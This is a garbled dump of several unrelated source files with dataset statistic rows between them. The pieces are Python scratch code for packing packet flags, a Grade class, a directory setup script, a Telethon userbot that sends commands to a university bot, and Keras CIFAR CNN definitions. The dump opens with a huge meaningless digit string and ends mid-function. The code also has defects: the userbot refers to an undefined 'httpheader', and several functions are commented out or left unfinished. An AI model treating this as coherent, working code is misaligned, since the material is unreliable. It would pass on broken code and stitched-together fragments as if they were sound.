7831473469547120362971850959159714008329375887793063201260941096793952783088558856646725608517265599725084384724563175899484728186995560290568807291826555071559466892036519612760220504602699914138367068172472017213682774967498701887581576623161758571812333859780259447306697217030079578897235635328736690869036673780574492864633992100216409926170704123909251778840227826004818156537128033200631508772626830227107036373126584283677145476537983934858713880890243734239692788929504571485237756978946897771534216268580118435819518265287019848284025634777877074995766690365323398182981407785286242127618931820406732964653930660155758461208175370783585128691434623046359931898162186733757111302033596729049254009030509216321711163892102827871675454454391781347802586564248032221168741170776241572147775258040040329627458131907667392605393963294455058024940357403275791857029672922704683845333640092279148461815166308612371919572404842591354551966759265854906305023113373464153225704383499664936527466246223661476797869951210031469586761543084810274429135013965707334631732702337824841740330567658750228268691074058230045179042525582463280738205215738570654990878750743473632964015238272734962837192587340749388049536691858127130119105897250796730422035633135852911912554197394401571728824866266035486632334893434781082989891682391872173497252507844118543080852524070954189044447189720419596997871318131061371754953084300140537999671269133877760556091565082970148447134663456996356247831557843817944052398872204541240300181655678829009153525040619726608338891378901153809526162389142748033770813670802228951206999025991977794242984873993367091968935438558744197934101316517229803133561417224142350165889451321851528767924907247493359835935276489293354822841055106711722938546805389980577020010960906614259775846332553974329644809666989569988315925588056744474717370644710641738559779564955115885584929625371493114354608121617916447497642500228004782706320382255759265948054495519710027710464
# print("data(byte) decoded:".upper(),exInt.to_bytes(1466, byteorder='big').rstrip(b'\x00').decode("UTF-8"))
unpacked_data = unpack('!hhBx', newPackedData[0:6]) #gives (1, 0, 8192)
flags = bin(unpacked_data[2])[2:][:-3]
flags_shifting = (5-len(str(flags)))*"0"+str(flags)
print("flags", flags, flags_shifting)
binary_val = int(bin(unpacked_data[2])[2:]) + 00000000
# str_flag = str(binary_val)
# shifting = ""
# while len(str_flag)<8:
# shifting+="0"
# str_flag = shifting+str_flag
print(binary_val)
print(bin(unpacked_data[2])[2:])
print(newPackedData[4], bin(newPackedData[4] |00), pack("B", unpacked_data[2] |0 )) #bin(unpacked_data[2])[2:])
print(unpack('!hh', newPackedData[0:4]),unpack('Bx', newPackedData[4:6]), int(bin(int(str(258), base=10))[2:]))
seq_num, ack_num, flags= unpacked_data
data = newPackedData[6:].rstrip(b'\x00').decode("UTF-8")
print(data)
flag_bits = int.from_bytes(newPackedData[4:6], byteorder='big')
print("flags:",bytes(newPackedData[4:6]),flag_bits)
int(bin(int(str(flag_bits), base=10))[2:])
print(unpacked_data)
print(int(bin(int(str(flags), base=10))[2:]))
print(len('10000000000000'))
print(unpack('!hh2B', newPackedData[0:6]))
print(int(bin(int(str(128), base=10))[2:]))
print(int(bin(int(str(128), base=10))[2:]))
'''
# PACKET
# b'\x90\x00' ->flags: dat_flag=1, ack_flag=1 | 10010
# flag bytes: ack_flag|nak_flag|get_flag|dat_flag|fin_flag|000
flag_pack = int(str(10010000),base=2)
ack_flag=1
nak_flag=0
get_flag=0
dat_flag=1
fin_flag=0
flag_list = [ack_flag,nak_flag,get_flag,dat_flag,fin_flag]
flag_str = "".join(map(str,flag_list))+"000"
#Byte format (convert the string into int then byte) x-> padding
flag_byte = pack("!B",int(flag_str,base=2))
print(flag_byte)
print(unpack("!B",flag_byte)[0])
print(flag_str)
# print(int(flag_str,base=2))
# print(flag_pack)
'''
## Find the flag value from byte
# ack_flag=0
# nak_flag=0
# get_flag=0
# dat_flag=0
# fin_flag=0
# testByte = b'\x90'
# testBinStr = bin(int(str(unpack("!B",testByte)[0]),base=10))[2:]
# print("Binary string of byte:",testBinStr)
# testBinList = [c for c in testBinStr[:5]]
# #flag_list = [ack_flag,nak_flag,get_flag,dat_flag,fin_flag] can use nametupled
# flag_list = [int(c) for c in testBinList]
# print(flag_list)
# print(testBinList)
# #PACK
# data =101
# packet_val_list = [seq_num,ack_num]
# packet_val_list.extend(flag_list)
# packet_val_list.append(data)
# print(packet_val_list)
###################################################################################################################################
flagS = [0,0,0,0,1]
flags = "00000"
flag_join = ''.join(map(str,flagS))
valid_flag_list = ["10000","01010","00100","00010","00001","10010","10001"]
valid= int(flags in valid_flag_list)
print(f"found: {flags in valid_flag_list}", flag_join, valid)
### Reading part
PAYLOAD_SIZE = 1466
read_pos = 4
file_name ='file.txt'
f = open(file_name, "r")
f.seek(PAYLOAD_SIZE*read_pos)
data_read = f.read(PAYLOAD_SIZE)
bool = 0
if(data_read):
bool = 1
print(f"read positon {read_pos}: {data_read} \r\n tell pos: {f.tell()} {bool}" )
| 292.663212
| 5,893
| 0.751469
| 12,644
| 56,484
| 3.347833
| 0.016292
| 1.655563
| 2.479305
| 3.302339
| 0.845074
| 0.841649
| 0.839192
| 0.838058
| 0.836971
| 0.835696
| 0
| 0.492958
| 0.018218
| 56,484
| 192
| 5,894
| 294.1875
| 0.270363
| 0.854083
| 0
| 0.045455
| 0
| 0.045455
| 0.790356
| 0.762152
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.022727
| 0
| 0.022727
| 0.340909
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 17
|
96394703817c5f9290fb2a87d861333630b2e1e5
| 226
|
py
|
Python
|
Part_2_intermediate/mod_3/lesson_5/ex_1/estudent/grade.py
|
Mikma03/InfoShareacademy_Python_Courses
|
3df1008c8c92831bebf1625f960f25b39d6987e6
|
[
"MIT"
] | null | null | null |
Part_2_intermediate/mod_3/lesson_5/ex_1/estudent/grade.py
|
Mikma03/InfoShareacademy_Python_Courses
|
3df1008c8c92831bebf1625f960f25b39d6987e6
|
[
"MIT"
] | null | null | null |
Part_2_intermediate/mod_3/lesson_5/ex_1/estudent/grade.py
|
Mikma03/InfoShareacademy_Python_Courses
|
3df1008c8c92831bebf1625f960f25b39d6987e6
|
[
"MIT"
] | null | null | null |
class Grade:
FAILING_GRADE = 1
def __init__(self, value):
self.value = value
def is_passing(self):
return self.value > Grade.FAILING_GRADE
def __repr__(self):
return str(self.value)
| 17.384615
| 47
| 0.623894
| 29
| 226
| 4.482759
| 0.448276
| 0.276923
| 0.261538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006211
| 0.287611
| 226
| 12
| 48
| 18.833333
| 0.801242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0.125
| 0
| 0.25
| 0.875
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
969183563eaecbd3cfd7aba68bff5697c68d6e68
| 1,732
|
py
|
Python
|
init.py
|
pk0912/TweetEmotionsPredictor
|
5325de8d6df6ea8e2d3627dc36eeb463b5c1ea92
|
[
"MIT"
] | null | null | null |
init.py
|
pk0912/TweetEmotionsPredictor
|
5325de8d6df6ea8e2d3627dc36eeb463b5c1ea92
|
[
"MIT"
] | null | null | null |
init.py
|
pk0912/TweetEmotionsPredictor
|
5325de8d6df6ea8e2d3627dc36eeb463b5c1ea92
|
[
"MIT"
] | null | null | null |
import os
import sys
import settings
os.makedirs(os.path.join(settings.ROOT_DIR, "utils"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "data"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "objects"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "outputs"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "notebooks"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "logs"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "tests"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "docs"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "data/raw_data"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "data/processed_data"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "data/training_data"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "data/validation_data"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "data/testing_data"), exist_ok=True)
os.makedirs(os.path.join(settings.ROOT_DIR, "data/raw_data/others"), exist_ok=True)
# For text based data
os.makedirs(
os.path.join(settings.ROOT_DIR, "data/processed_data/simple"), exist_ok=True
)
os.makedirs(
os.path.join(settings.ROOT_DIR, "data/processed_data/complex"), exist_ok=True
)
os.makedirs(
os.path.join(settings.ROOT_DIR, "data/training_data/word_2_index"), exist_ok=True
)
os.makedirs(
os.path.join(settings.ROOT_DIR, "data/validation_data/word_2_index"), exist_ok=True
)
os.makedirs(os.path.join(settings.ROOT_DIR, "data/training_data/tf_idf"), exist_ok=True)
os.makedirs(
os.path.join(settings.ROOT_DIR, "data/validation_data/tf_idf"), exist_ok=True
)
sys.path.insert(0, settings.ROOT_DIR)
| 43.3
| 88
| 0.773095
| 294
| 1,732
| 4.353742
| 0.129252
| 0.196875
| 0.246094
| 0.25
| 0.879688
| 0.879688
| 0.863281
| 0.863281
| 0.835938
| 0.835938
| 0
| 0.001846
| 0.061778
| 1,732
| 39
| 89
| 44.410256
| 0.785846
| 0.01097
| 0
| 0.147059
| 0
| 0
| 0.18761
| 0.098773
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.088235
| 0
| 0.088235
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
96a82e85be73c29a15985fd27e218410f1987854
| 3,913
|
py
|
Python
|
userbot/modules/kuliah.py
|
jakasemprul/XBot-Remix
|
943ee5b0dd5c2df16c48c90281f2a837ef7283ce
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/kuliah.py
|
jakasemprul/XBot-Remix
|
943ee5b0dd5c2df16c48c90281f2a837ef7283ce
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/kuliah.py
|
jakasemprul/XBot-Remix
|
943ee5b0dd5c2df16c48c90281f2a837ef7283ce
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | 4
|
2020-12-25T16:18:08.000Z
|
2021-11-01T19:28:28.000Z
|
from telethon import events
from telethon.errors.rpcerrorlist import YouBlockedUserError
from userbot import bot, CMD_HELP
from userbot.events import register
@register(outgoing=True, pattern=r"^\.matkul(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
event.pattern_match.group(1)
chat = "@unsiq_bot" # pylint:disable=E0602
matakuliah = f"matakuliah" # pylint:disable=E0602
await event.edit("Processing....")
async with bot.conversation("@unsiq_bot") as conv:
try:
response = conv.wait_event(
events.NewMessage(
incoming=True,
from_users=458359369))
await conv.send_message(f'/{matakuliah}')
response = await response
except YouBlockedUserError:
await event.reply("Unblock @ unsiq_bot dulu Goblok!!")
return
else:
await event.edit(f"{response.message.message}")
await event.client.delete_messages(response.message.message)
@register(outgoing=True, pattern=r"^\.passwd(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
event.pattern_match.group(1)
chat = "@unsiq_bot" # pylint:disable=E0602
password = f"password" # pylint:disable=E0602
await event.edit("Processing....")
async with bot.conversation("@unsiq_bot") as conv:
try:
response = conv.wait_event(
events.NewMessage(
incoming=True,
from_users=458359369))
await conv.send_message(f'/{password}')
response = await response
except YouBlockedUserError:
await event.reply("Unblock @ unsiq_bot dulu Goblok!!")
return
else:
await event.edit(f"{response.message.message}")
await event.client.delete_messages(response.message.message)
@register(outgoing=True, pattern=r"^\.idtele(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
event.pattern_match.group(1)
chat = "@unsiq_bot" # pylint:disable=E0602
cekid = f"cekid" # pylint:disable=E0602
await event.edit("Processing....")
async with bot.conversation("@unsiq_bot") as conv:
try:
response = conv.wait_event(
events.NewMessage(
incoming=True,
from_users=458359369))
await conv.send_message(f'/{cekid}')
response = await response
except YouBlockedUserError:
await event.reply("Unblock @ unsiq_bot dulu Goblok!!")
return
else:
await event.edit(f"{response.message.message}")
await event.client.delete_messages(httpheader, response.message.message)
@register(outgoing=True, pattern=r"^\.dis(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
event.pattern_match.group(1)
chat = "@unsiq_bot" # pylint:disable=E0602
dis = f"dis" # pylint:disable=E0602
await event.edit("Processing....")
async with bot.conversation("@unsiq_bot") as conv:
try:
response = conv.wait_event(
events.NewMessage(
incoming=True,
from_users=458359369))
await conv.send_message(f'DIS {id_materi} {komentar}')
response = await response
except YouBlockedUserError:
await event.reply("Unblock @ unsiq_bot dulu Goblok!!")
return
else:
await event.edit(f"{response.message.message}")
await event.client.delete_messages(httpheader, response.message.message)
CMD_HELP.update({
"kuliah":
"`.matkul`\
\nUsage: Untuk menampilkan mata kuliah.\
\n\n`.passwd`\
\nUsage: untuk mengganti password e-learning.\
\n\n`.idtele`\
\nUsage: untuk cek id telegram .\
\n\n`.dis`\
\nUsage: untuk komentar DIS (NOMER) ."
})
| 34.628319
| 84
| 0.604396
| 425
| 3,913
| 5.463529
| 0.188235
| 0.068906
| 0.062016
| 0.046512
| 0.81826
| 0.806202
| 0.806202
| 0.806202
| 0.794143
| 0.794143
| 0
| 0.02537
| 0.274725
| 3,913
| 112
| 85
| 34.9375
| 0.792812
| 0.042678
| 0
| 0.737864
| 0
| 0
| 0.144233
| 0.02783
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.048544
| 0.038835
| 0
| 0.116505
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96bc3f8c398716a7f73ce04abf95ba45834ce523
| 200
|
py
|
Python
|
corehq/ex-submodules/casexml/apps/stock/tests/__init__.py
|
johan--/commcare-hq
|
86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/ex-submodules/casexml/apps/stock/tests/__init__.py
|
johan--/commcare-hq
|
86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd
|
[
"BSD-3-Clause"
] | 1
|
2022-03-12T01:03:25.000Z
|
2022-03-12T01:03:25.000Z
|
corehq/ex-submodules/casexml/apps/stock/tests/__init__.py
|
johan--/commcare-hq
|
86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd
|
[
"BSD-3-Clause"
] | null | null | null |
from .test_consumption_calc import *
from .test_consumption_for_case import *
from .test_inferred_transactions import *
from .test_stock_transaction import *
from .test_logistics_consumption import *
| 33.333333
| 41
| 0.85
| 26
| 200
| 6.115385
| 0.461538
| 0.251572
| 0.352201
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 200
| 5
| 42
| 40
| 0.883333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73bb06f132665e98f3928a28452d020aef835771
| 16,856
|
py
|
Python
|
pretrained_teachers/style_nets.py
|
orram/DynamicalRecurrentClassifier
|
d517681cf42aa4fe59107a865cc85b8d5cdbad25
|
[
"Apache-2.0"
] | 2
|
2021-04-28T13:33:45.000Z
|
2021-11-09T14:31:09.000Z
|
pretrained_teachers/style_nets.py
|
orram/DynamicalRecurrentClassifier
|
d517681cf42aa4fe59107a865cc85b8d5cdbad25
|
[
"Apache-2.0"
] | null | null | null |
pretrained_teachers/style_nets.py
|
orram/DynamicalRecurrentClassifier
|
d517681cf42aa4fe59107a865cc85b8d5cdbad25
|
[
"Apache-2.0"
] | 1
|
2021-03-07T13:25:59.000Z
|
2021-03-07T13:25:59.000Z
|
import numpy as np
import tensorflow as tf
from tensorflow import keras
def baseline_net(*args):
input = keras.layers.Input(shape=(32, 32, 3))
# Define CNN
x = keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same',
name='cnn1')(input)
x = keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same',
name='cnn12')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool1')(x)
x = keras.layers.Dropout(0.2)(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn2')(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn22')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool2')(x)
x = keras.layers.Dropout(0.2)(x)
x = keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same',
name='cnn3')(x)
x = keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same',
name='cnn32')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool3')(x)
x = keras.layers.Dropout(0.2)(x)
# Flatten and add linear layer and softmax'''
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(128, activation="relu",
name='fc1')(x)
x = keras.layers.Dense(10, activation="softmax",
name='final')(x)
model = keras.models.Model(inputs=input, outputs=x)
# opt = tf.keras.optimizers.Adam(lr=1e-3)
#
# model.compile(
# optimizer=opt,
# loss="sparse_categorical_crossentropy",
# metrics=["sparse_categorical_accuracy"],
# )
return model
def baseline_net_with_skips(*args):
input = keras.layers.Input(shape=(32, 32, 3))
# Define CNN
x = keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same',
name='cnn1')(input)
x = keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same',
name='cnn12')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool1')(x)
x = keras.layers.Dropout(0.2)(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn2')(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn22')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool2')(x)
skip = x
x = keras.layers.Dropout(0.2)(x)
x = keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same',
name='cnn3')(x)
x = keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same',
name='cnn32')(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn33')(x)
x= keras.layers.add([x,skip])
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool3')(x)
x = keras.layers.Dropout(0.2)(x)
# Flatten and add linear layer and softmax'''
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(128, activation="relu",
name='fc1')(x)
x = keras.layers.Dense(10, activation="softmax",
name='final')(x)
model = keras.models.Model(inputs=input, outputs=x)
# opt = tf.keras.optimizers.Adam(lr=1e-3)
#
# model.compile(
# optimizer=opt,
# loss="sparse_categorical_crossentropy",
# metrics=["sparse_categorical_accuracy"],
# )
return model
def baseline_net_with_skips_deeper(*args):
input = keras.layers.Input(shape=(32, 32, 3))
# Define CNN
x = keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same',
name='cnn1')(input)
x = keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same',
name='cnn12')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool1')(x)
x = keras.layers.Dropout(0.2)(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn2')(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn22')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool2')(x)
for ii in range(3):
skip = x
x = keras.layers.Dropout(0.2)(x)
x = keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same',
name='cnn3_'+str(ii))(x)
x = keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same',
name='cnn32_'+str(ii))(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn33_'+str(ii))(x)
x = keras.layers.add([x, skip])
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool3')(x)
x = keras.layers.Dropout(0.2)(x)
# Flatten and add linear layer and softmax'''
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(128, activation="relu",
name='fc1')(x)
x = keras.layers.Dense(10, activation="softmax",
name='final')(x)
model = keras.models.Model(inputs=input, outputs=x)
# opt = tf.keras.optimizers.Adam(lr=1e-3)
#
# model.compile(
# optimizer=opt,
# loss="sparse_categorical_crossentropy",
# metrics=["sparse_categorical_accuracy"],
# )
return model
def baseline_net_with_skips_deeper_laynorm(*args):
input = keras.layers.Input(shape=(32, 32, 3))
# Define CNN
x = keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same',
name='cnn1')(input)
x = keras.layers.Conv2D(32, (3, 3), activation='relu', padding='same',
name='cnn12')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool1')(x)
x = keras.layers.Dropout(0.2)(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn2')(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn22')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool2')(x)
for ii in range(3):
skip = x
x = keras.layers.LayerNormalization(axis=3)(x)
x = keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same',
name='cnn3_'+str(ii))(x)
x = keras.layers.Conv2D(128, (3, 3), activation='relu', padding='same',
name='cnn32_'+str(ii))(x)
x = keras.layers.Conv2D(64, (3, 3), activation='relu', padding='same',
name='cnn33_'+str(ii))(x)
x = keras.layers.add([x, skip])
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool3')(x)
x = keras.layers.LayerNormalization(axis=3)(x)
# Flatten and add linear layer and softmax'''
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(128, activation="relu",
name='fc1')(x)
x = keras.layers.Dense(10, activation="softmax",
name='final')(x)
model = keras.models.Model(inputs=input, outputs=x)
# opt = tf.keras.optimizers.Adam(lr=1e-3)
#
# model.compile(
# optimizer=opt,
# loss="sparse_categorical_crossentropy",
# metrics=["sparse_categorical_accuracy"],
# )
return model
def parametric_net(dropout1=0.2, dropout2=0.0, resblocks=3, layer_norm_res=True, layer_norm_2=True, skip_conn=True, last_maxpool_en=True, nl='relu',last_layer_size=128):
input = keras.layers.Input(shape=(32, 32, 3))
# Define CNN
x = keras.layers.Conv2D(32, (3, 3), activation=nl, padding='same',
name='cnn1')(input)
x = keras.layers.Conv2D(32, (3, 3), activation=nl, padding='same',
name='cnn12')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool1')(x)
x = keras.layers.Dropout(dropout1)(x)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn2')(x)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn22')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool2')(x)
for ii in range(resblocks):
skip = x
if layer_norm_res:
x = keras.layers.LayerNormalization(axis=3)(x)
x = keras.layers.Conv2D(128, (3, 3), activation=nl, padding='same',
name='cnn3_'+str(ii))(x)
x = keras.layers.Conv2D(128, (3, 3), activation=nl, padding='same',
name='cnn32_'+str(ii))(x)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn33_'+str(ii))(x)
if skip_conn:
x = keras.layers.add([x, skip])
if last_maxpool_en:
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool3')(x)
else:
x = keras.layers.MaxPooling2D((1, 1),
name='max_pool3')(x) #todo: strange behavior if nothing here.. don't know why
if layer_norm_2:
x = keras.layers.LayerNormalization(axis=3)(x)
# Flatten and add linear layer and softmax'''
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(last_layer_size, activation=nl,
name='fc1')(x)
x = keras.layers.Dropout(dropout2)(x)
x = keras.layers.Dense(10, activation="softmax",
name='final')(x)
model = keras.models.Model(inputs=input, outputs=x)
# opt = tf.keras.optimizers.Adam(lr=1e-3)
#
# model.compile(
# optimizer=opt,
# loss="sparse_categorical_crossentropy",
# metrics=["sparse_categorical_accuracy"],
# )
return model
def parametric_net_befe(dropout1=0.2, dropout2=0.0, resblocks=3, layer_norm_res=True, layer_norm_2=True, skip_conn=True,
last_maxpool_en=True, nl='relu', last_layer_size=128, dense_interface=False):
### front end model
input0 = keras.layers.Input(shape=(32, 32, 3))
# Define CNN
x = keras.layers.Conv2D(32, (3, 3), activation=nl, padding='same',
name='cnn1')(input0)
x = keras.layers.Conv2D(32, (3, 3), activation=nl, padding='same',
name='cnn12')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool1')(x)
x = keras.layers.Dropout(dropout1)(x)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn2')(x)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn22')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool2')(x)
if dense_interface:
x = keras.layers.Conv2D(64, (3, 3), padding='same',
name='anti_sparse')(x)
if layer_norm_res:
x = keras.layers.LayerNormalization(axis=3)(x)
fe_model = keras.models.Model(inputs=input0, outputs=x, name='frontend')
####### backend model
input1 = keras.layers.Input(shape=np.shape(x)[1:])
x = input1
for ii in range(resblocks):
skip = x
if layer_norm_res:
x = keras.layers.LayerNormalization(axis=3)(x)
x = keras.layers.Conv2D(128, (3, 3), activation=nl, padding='same',
name='cnn3_' + str(ii))(x)
x = keras.layers.Conv2D(128, (3, 3), activation=nl, padding='same',
name='cnn32_' + str(ii))(x)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn33_' + str(ii))(x)
if skip_conn:
x = keras.layers.add([x, skip])
if last_maxpool_en:
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool3')(x)
else:
x = keras.layers.MaxPooling2D((1, 1),
name='max_pool3')(x) # todo: strange behavior if nothing here.. don't know why
if layer_norm_2:
x = keras.layers.LayerNormalization(axis=3)(x)
# Flatten and add linear layer and softmax'''
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(last_layer_size, activation=nl,
name='fc1')(x)
x = keras.layers.Dropout(dropout2)(x)
x = keras.layers.Dense(10, activation="softmax",
name='final')(x)
be_model = keras.models.Model(inputs=input1, outputs=x, name='backend')
model = tf.keras.models.Sequential()
model.add(fe_model)
model.add(be_model)
return model # fe_model, be_model
def parametric_net_befe_v2(dropout1=0.2, dropout2=0.0, resblocks16=3,resblocks8=3, layer_norm_res16=True,layer_norm_res8=True, layer_norm_2=True, skip_conn16=True,skip_conn8=True,
dense_interface=True,last_maxpool_en=True, nl='relu', last_layer_size=128):
### front end model
input0 = keras.layers.Input(shape=(32, 32, 3))
# Define CNN
x = keras.layers.Conv2D(32, (3, 3), activation=nl, padding='same',
name='cnn1')(input0)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn12')(x)
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool1')(x)
x = keras.layers.Dropout(dropout1)(x)
for ii in range(resblocks16):
skip = x
if layer_norm_res16:
x = keras.layers.LayerNormalization(axis=3)(x)
x = keras.layers.Conv2D(128, (3, 3), activation=nl, padding='same',
name='cnn21_' + str(ii))(x)
x = keras.layers.Conv2D(128, (3, 3), activation=nl, padding='same',
name='cnn22_' + str(ii))(x)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn23_' + str(ii))(x)
if skip_conn16:
x = keras.layers.add([x, skip])
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool2')(x)
if dense_interface:
x = keras.layers.Conv2D(64, (3, 3), padding='same',
name='anti_sparse')(x)
if layer_norm_res8:
x = keras.layers.LayerNormalization(axis=3)(x)
fe_model = keras.models.Model(inputs=input0, outputs=x, name='frontend')
####### backend model
input1 = keras.layers.Input(shape=np.shape(x)[1:])
# if dense_interface:
# x = keras.layers.ELU()(x)
x = input1
for ii in range(resblocks8):
skip = x
if layer_norm_res8:
x = keras.layers.LayerNormalization(axis=3)(x)
x = keras.layers.Conv2D(128, (3, 3), activation=nl, padding='same',
name='cnn3_' + str(ii))(x)
x = keras.layers.Conv2D(128, (3, 3), activation=nl, padding='same',
name='cnn32_' + str(ii))(x)
x = keras.layers.Conv2D(64, (3, 3), activation=nl, padding='same',
name='cnn33_' + str(ii))(x)
if skip_conn8:
x = keras.layers.add([x, skip])
if last_maxpool_en:
x = keras.layers.MaxPooling2D((2, 2),
name='max_pool3')(x)
else:
x = keras.layers.MaxPooling2D((1, 1),
name='max_pool3')(x) # todo: strange behavior if nothing here.. don't know why
if layer_norm_2:
x = keras.layers.LayerNormalization(axis=3)(x)
# Flatten and add linear layer and softmax'''
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(last_layer_size, activation=nl,
name='fc1')(x)
x = keras.layers.Dropout(dropout2)(x)
x = keras.layers.Dense(10, activation="softmax",
name='final')(x)
be_model = keras.models.Model(inputs=input1, outputs=x, name='backend')
